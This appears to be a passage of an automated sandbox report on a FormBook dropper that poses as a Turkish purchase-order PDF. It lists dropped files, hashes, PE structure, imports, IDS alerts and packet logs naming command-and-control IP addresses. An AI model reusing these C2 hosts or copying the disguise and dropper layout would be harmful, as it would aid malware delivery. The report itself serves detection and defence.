                                                                Preview:00000000BB0000D7D700008E00007E001C1C1C00E600004A00D4D4009D9D9D00E70000DE008A8A00000000C500F3F3F3F300AA00CBCBCBCB0000000000EC000D00004F4F00780000020000F3F30097979797970063000000240008000000C50032000000C2C200C9C9C900D1003700C60000003E000000008200F8002E0000003E3E00000000009A9A00E3000014002D000000000000000000000003030057575700900000F5F5005E000000000000000000B1B1B1B100B7B7B700AFAF00E7E7008700C4000016161616008181000000000000DE0000006666000000006A000000000000002E2E2E00BEBE0000000000007676000048484800D9D9D9D900007171710000232300C8C80000747400000032000000000800646464006D009B007C000000340099999900F90000000000A200000000000000363600787878780000C4C400000000890000B60000B3000000707070707000717171717171000000E6E6E600000000DBDB0000000000A0A0A0A00059006767676700000061000095950000424242424200000000000077770000000C00000000EF004500D3D300670000470000D5D500000060007171002A000000CA00FE000005003A3A00686868680000000098980000C0C00010100000A6A6A6000202000000CECECE0011003737000D00D30000000000007E007900737373003333

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow\frtr.jpg

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 2000x2000, components 3
                                                                Category:dropped
                                                                Size (bytes):165466
                                                                Entropy (8bit):6.5947581943238625
                                                                Encrypted:false
                                                                SSDEEP:3072:b9bANrxjToG8aMvWDtSYT8TBs9M/U2UKEVKQUsLNcY/:Sxj5AeyBN/U2L6KQfNZ
                                                                MD5:152B2AA9B4B656DF132C2E5EAD37A7D5
                                                                SHA1:9C0FDBAAB3A483D4857BB8A2269CD21177BBD1D9
                                                                SHA-256:11970E0E0D67A2FD31BD5907E279F43F52A3B2547391FF843B52BF79062CA00F
                                                                SHA-512:4D756CC91321FD2646D5383E3EC3F736BA2B59DD46C912D9D28CD67858A4FA9A6E2FD8312F91D1EEA4392B01830DDD1F59B40353265D0B9CA84F7DA2D62F2E10
                                                                Malicious:false
                                                                Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((.....................................................Z........................!..1.."AQ.2aq..#B...R...$3br.4Cs...%&5STc..6D...dt...7.'EUu....................................3........................1.!23AqQ."a#4..$B...R..D.............?..H..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow\lukkedagenes.fli

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):321960
                                                                Entropy (8bit):1.240482616634199
                                                                Encrypted:false
                                                                SSDEEP:768:phtcv5KE3yqV0L8Xi1Sk4gVNBo/iZcRxZq129cB/ckCkoPtvb292Qrg/Bt2bNsQe:utkxDPfCkoGBdszPmWJqU
                                                                MD5:66087BEC9068998EE8F271F0580AB3F5
                                                                SHA1:80980F5A1BD6DAF01263730273F945B031F75AE3
                                                                SHA-256:248D9672E365A5C58F1AF62BA50E7FA4BFCF518846DA63ACA19797201C9E5F44
                                                                SHA-512:046A00F3DB8C6A5C2BD71A43D13FEC6418AA0E30EA77CA12BEB082F8EDCFF9D3F31BCAD7B40A6D02722F5092215279681A96E103503063A52786314D21FE83FD
                                                                Malicious:false
                                                                Preview:...............................................................S...................................d...........................c........kY....................................................b..........~..f..............o.....................i...........................................................................................z...N...............b..............................@........................ ................;.............../..............$..........J....................I..~.......................................u........................................................................................................................+E.....................u.............j...................................a........................".................6.....4.....................................................................................................z.................P........................................................................................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Bubblebow\opisthocomine.nit

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):263192
                                                                Entropy (8bit):1.2599632446975992
                                                                Encrypted:false
                                                                SSDEEP:768:XWXGdC9WRz+JhP7he1s7N4PjZlGpwlN8HmDEh/jTqcx1uNp9ieDc0VSLrPSsGCCu:IGdVcNN49lGp5UibEBfJv
                                                                MD5:0EDAE6068FC853ECD4597C0C717729E8
                                                                SHA1:8F02F7B5B9524451D3E2FA336B898883E8707FEA
                                                                SHA-256:FA5E6764D56E5EBCB89C97A192ADF8F246D7E3C5683A5864C7A8714DD977210C
                                                                SHA-512:EF8D9006A9FC63F31F6677C6500C8C9AD13CDCF45F76AAB2EAD30CE98DD223D87782DC29869B9D3C7C0729320DF341CF25F384F0EC775A8F4EA6F5BEA101EC2D
                                                                Malicious:false
                                                                Preview:........................................................................................................................a......................f.........iU........................n..................................!................................X..................F......M...............................................7.....................l................@.........G..............I...........................................................................4..............I.............................................................................-....$......................^................................................................................................q...............s............................./........................................g...J....}.......j..........................gs.......................................L......H...........~.................L............E.........(................................................O.......................................

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Prestigebyggeriet.Hou

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):295249
                                                                Entropy (8bit):7.618032385976438
                                                                Encrypted:false
                                                                SSDEEP:6144:lr+nJ22o7DeFKasx7cmDYO/8LEe0pnwTgSySSXbreaco:lr97D+cYO0IVmgSo5co
                                                                MD5:207749EAAACDEFB73F38371149004D58
                                                                SHA1:62489495A62F1E73BE546A5C6410D78A85F23CC0
                                                                SHA-256:5BF434415EC94817697E69A40321457908E38095C947210FBAE7E94A48ED6F9C
                                                                SHA-512:79944A96F88CE41C4FEADFD6A75899096C2059CE29530B14568B1E2BF94251927FDE2FEC8E0EE46B252B7C2CD64D274F96D18B5F5519FC5075AD59D316D1A3E1
                                                                Malicious:false
                                                                Preview:...................tt........aaa..........}}}}}...g.00...l.UUUU..e....,..!.......p....33333....`..bb.##..............f.P............\................oooo..'................j.=.........................3333...gg.yy................VVV................yy...MMM....$......ssss...BB...s...................jj................J..................E.....i.h..9..}}.YY.....//...........@@@...H.................................IIIII...DD.......mm.....E.^...U......>......m...,..MMM.......................ZZZZ...............YY......W........O.........A......ss.?.........nn........777.I....gg...<.....U....!.........]........%.......;;.u.,........(... ..........ss..S..................I........ll..XXXX........................D.........LLLLLLL.....x.........GG........OOOO.)......99...................................]..................iii..........................cc..............%...................B.@@@@@@........GG..cccc..............................p.G.HHH..33..C. ..............9.........>...........^^^.....

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\defencives.pol

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):455315
                                                                Entropy (8bit):1.2477113828127742
                                                                Encrypted:false
                                                                SSDEEP:1536:o/yCFoEvvG0yx5hyNnuPwAVpwtCTuOf9aSDAUg:o/2Enyx5+uPwAnwMSADAUg
                                                                MD5:761F2A757CD380F71E205335CE088495
                                                                SHA1:7E1C38708629925DF64A30EB0B722A7C44FA6150
                                                                SHA-256:56A1E386A92086888D3C0F9437CC34AACFF1AF55D59A0393EEBC220D4BC2697B
                                                                SHA-512:5DB2A3E96E93E576E861F10296DB05ED890311EE2F31D930B330DCB418246C9E3C750272CCB781811B3C8BFAD940ACAB64040F72786DE4A839C7238B984E2E02
                                                                Malicious:false
                                                                Preview:.5......................&.............................a....b.......................e.....................6..........H......................1.....a..J......................L.........................l...........a......................................I...............Y...................4...........................................w.............................................m.......D.......................(................................................................V........................................W.......................................................n.......D.....................................................................}....................................................................................................................z......................................:.....G..N:........................1............N.....................M.......................8.......................................................................Z......b...:...................

                                                                C:\Windows\Resources\0809\mysterist.ini

                                                                Download File
                                                                Process:C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):38
                                                                Entropy (8bit):4.006841738213845
                                                                Encrypted:false
                                                                SSDEEP:3:kQMicv7Wz+v:clvSz+v
                                                                MD5:8674B487F44FE91156094E810B1A3128
                                                                SHA1:27F1EB1FBAFFBD6AF90FD2F084081BD4A96E9498
                                                                SHA-256:4F0B489724F53D0E8C6BFE50C9EA02251EEBDD7A96855091C2F6E8768F683E5D
                                                                SHA-512:4AE1B103E5E58D5EEA6EC6DB2E4DA96557B88C32CE6860E9B2986C628DD26B95162261F33E6036388184FFA5256B45BE91BE7E8C9DA85BD5945E29F2360D19E9
                                                                Malicious:false
                                                                Preview:[parsimoniously]..Vesigia=unassessed..

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.191634712480565
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
                                                                File size:991'098 bytes
                                                                MD5:f33b6e1067bf27d4bea237206532881e
                                                                SHA1:5602bb70d47fb5f8061688b62b6f9b3bafd1a4bc
                                                                SHA256:2ab9083b17140ee82b2d96fceecfc3ad8c286b320222b074719fe7a1852ab91a
                                                                SHA512:4bd51edf3d884ac43dac8f5f1f856020b3ebfa569754da47ce98bca18e7389ea439af3624441200ea330b9821f6596b5e433b41d6ba0397590afe95a53381280
                                                                SSDEEP:24576:oewAoAZIk1OZaFT40sBSBCbnx7eqhOxQUsHVSm:CAFLEZaChBSBCr5eqoxQhHs
                                                                TLSH:F425C006FF58C787C6EA6E7489F6B3096A2DCBC99CD38B02E64568D8F670F1874C4584
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....

                                                                File Icon

                                                                Icon Hash:c5cdc989d5cde097

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x403359
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                Entrypoint Preview

                                                                Instruction
                                                                sub esp, 000002D4h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                push 00000020h
                                                                pop edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+14h], ebx
                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                mov dword ptr [esp+1Ch], ebx
                                                                call dword ptr [004080A8h]
                                                                call dword ptr [004080A4h]
                                                                and eax, BFFFFFFFh
                                                                cmp ax, 00000006h
                                                                mov dword ptr [0042A20Ch], eax
                                                                je 00007F1BB0FC7AC3h
                                                                push ebx
                                                                call 00007F1BB0FCAD75h
                                                                cmp eax, ebx
                                                                je 00007F1BB0FC7AB9h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082B0h
                                                                push esi
                                                                call 00007F1BB0FCACEFh
                                                                push esi
                                                                call dword ptr [00408150h]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], 00000000h
                                                                jne 00007F1BB0FC7A9Ch
                                                                push 0000000Ah
                                                                call 00007F1BB0FCAD48h
                                                                push 00000008h
                                                                call 00007F1BB0FCAD41h
                                                                push 00000006h
                                                                mov dword ptr [0042A204h], eax
                                                                call 00007F1BB0FCAD35h
                                                                cmp eax, ebx
                                                                je 00007F1BB0FC7AC1h
                                                                push 0000001Eh
                                                                call eax
                                                                test eax, eax
                                                                je 00007F1BB0FC7AB9h
                                                                or byte ptr [0042A20Fh], 00000040h
                                                                push ebp
                                                                call dword ptr [00408044h]
                                                                push ebx
                                                                call dword ptr [004082A0h]
                                                                mov dword ptr [0042A2D8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+34h]
                                                                push 000002B4h
                                                                push eax
                                                                push ebx
                                                                push 004216A8h
                                                                call dword ptr [00408188h]
                                                                push 0040A2C8h

                                                                Rich Headers

                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x500000x5ab18.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x62a50x6400f4cff166abb4376522cf86cbd302f644False0.658984375data6.431390019180314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .ndata0x2b0000x250000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0x500000x5ab180x5ac008e289f0503c71e1dae735f54bd537b3dFalse0.3740799328512397data4.762577612489826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x504a80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.35952525372074445
                                                                RT_ICON0x924d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.3869188453803383
                                                                RT_ICON0xa2cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.5096473029045643
                                                                RT_ICON0xa52a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6343808630393997
                                                                RT_ICON0xa63480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5815565031982942
                                                                RT_ICON0xa71f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6877049180327869
                                                                RT_ICON0xa7b780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.723826714801444
                                                                RT_ICON0xa84200x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.6359447004608295
                                                                RT_ICON0xa8ae80x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.2725609756097561
                                                                RT_ICON0xa91500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.4602601156069364
                                                                RT_ICON0xa96b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7606382978723404
                                                                RT_ICON0xa9b200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.34139784946236557
                                                                RT_ICON0xa9e080x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 0EnglishUnited States0.39549180327868855
                                                                RT_ICON0xa9ff00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.44594594594594594
                                                                RT_DIALOG0xaa1180xb8dataEnglishUnited States0.6467391304347826
                                                                RT_DIALOG0xaa1d00x144dataEnglishUnited States0.5216049382716049
                                                                RT_DIALOG0xaa3180x100dataEnglishUnited States0.5234375
                                                                RT_DIALOG0xaa4180x11cdataEnglishUnited States0.6056338028169014
                                                                RT_DIALOG0xaa5380x60dataEnglishUnited States0.7291666666666666
                                                                RT_GROUP_ICON0xaa5980xcadataEnglishUnited States0.5792079207920792
                                                                RT_VERSION0xaa6680x21cdataEnglishUnited States0.5314814814814814
                                                                RT_MANIFEST0xaa8880x290XML 1.0 document, ASCII text, with very long lines (656), with no line terminatorsEnglishUnited States0.5625

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-25T07:09:05.328915+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449743103.83.194.5080TCP
                                                                2024-11-25T07:09:48.405139+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449839195.110.124.13380TCP
                                                                2024-11-25T07:10:05.322973+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449875104.21.95.16080TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 25, 2024 07:09:03.876111984 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:03.995788097 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:03.996829987 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:04.002588987 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:04.122050047 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.328820944 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.328905106 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.328915119 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.328943968 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.328944921 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.328957081 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.328990936 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.329082966 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.329094887 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.329106092 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.329125881 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.329137087 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.329155922 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.329179049 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.329191923 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.329202890 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.329225063 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.329253912 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.448561907 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.448622942 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.448683977 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.448710918 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.452786922 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.452846050 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.452872038 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.452918053 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.461153030 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.461210012 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.539383888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.539400101 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.539469004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.543579102 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.543695927 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.543776989 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.551943064 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.555021048 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.555082083 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.555105925 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.555154085 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.563429117 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.563440084 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.563493013 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.571763039 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.571901083 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.571954012 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.580183983 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.580315113 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.580377102 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.588888884 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.589024067 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.589080095 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.596229076 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.596326113 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.596384048 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.603482008 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.603585005 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.603642941 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.610877037 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.610979080 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.611031055 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.618002892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.618135929 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.618308067 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.625154972 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.626876116 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.749896049 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.750046015 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.750077009 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.750108004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.752247095 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.752301931 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.752417088 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.752461910 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.757062912 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.757119894 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.757144928 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.757194042 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.761781931 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.761843920 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.761881113 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.762873888 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.766582012 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.766640902 CET4974380192.168.2.4103.83.194.50
